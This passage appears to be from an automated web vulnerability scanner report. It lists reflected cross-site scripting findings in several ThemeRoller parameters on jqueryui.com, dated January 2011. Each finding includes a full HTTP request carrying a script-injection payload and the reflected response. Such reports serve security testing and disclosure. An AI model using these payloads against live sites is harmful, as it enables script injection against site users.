X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=034b50"><script>alert(1)</script>5a9fde23895&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" t
...[SNIP]...

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862b5"><script>alert(1)</script>264ef754561 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100862b5"><script>alert(1)</script>264ef754561&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100862b5"><script>alert(1)</script>264ef754561&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.30. http://jqueryui.com/themeroller/ [bgTextureActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40148"><script>alert(1)</script>b76740fa911 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png40148"><script>alert(1)</script>b76740fa911&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png40148"><script>alert(1)</script>b76740fa911&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4
...[SNIP]...

3.31. http://jqueryui.com/themeroller/ [bgTextureContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a15e"><script>alert(1)</script>81a0d838539 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png4a15e"><script>alert(1)</script>81a0d838539&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png4a15e"><script>alert(1)</script>81a0d838539&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF
...[SNIP]...

3.32. http://jqueryui.com/themeroller/ [bgTextureDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe60a"><script>alert(1)</script>ce06652329f was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.pngfe60a"><script>alert(1)</script>ce06652329f&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.pngfe60a"><script>alert(1)</script>ce06652329f&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=
...[SNIP]...

3.33. http://jqueryui.com/themeroller/ [bgTextureError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40d0"><script>alert(1)</script>ec045cea2ed was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngc40d0"><script>alert(1)</script>ec045cea2ed&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngc40d0"><script>alert(1)</script>ec045cea2ed&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTex
...[SNIP]...

3.34. http://jqueryui.com/themeroller/ [bgTextureHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d571"><script>alert(1)</script>b542d36e1a6 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png1d571"><script>alert(1)</script>b542d36e1a6&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
meroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png1d571"><script>alert(1)</script>b542d36e1a6&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666
...[SNIP]...

3.35. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb4d"><script>alert(1)</script>b1e44b09bce was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngabb4d"><script>alert(1)</script>b1e44b09bce&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngabb4d"><script>alert(1)</script>b1e44b09bce&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B
...[SNIP]...

3.36. http://jqueryui.com/themeroller/ [bgTextureHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c782"><script>alert(1)</script>75def417c71 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png4c782"><script>alert(1)</script>75def417c71&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png4c782"><script>alert(1)</script>75def417c71&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC
...[SNIP]...

3.37. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7dc"><script>alert(1)</script>ced59be90ca was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pngac7dc"><script>alert(1)</script>ced59be90ca&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
